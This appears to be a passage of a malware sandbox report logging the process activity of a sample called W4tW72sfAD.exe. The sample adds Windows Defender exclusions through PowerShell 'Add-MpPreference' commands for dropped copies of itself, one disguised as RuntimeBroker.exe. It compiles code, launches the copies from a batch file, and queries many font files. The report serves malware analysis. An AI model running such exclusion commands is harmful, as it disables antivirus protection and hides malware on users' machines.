Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Queries volume information: C:\Users\user\Desktop\W4tW72sfAD.exe VolumeInformation
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Queries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Queries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Queries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
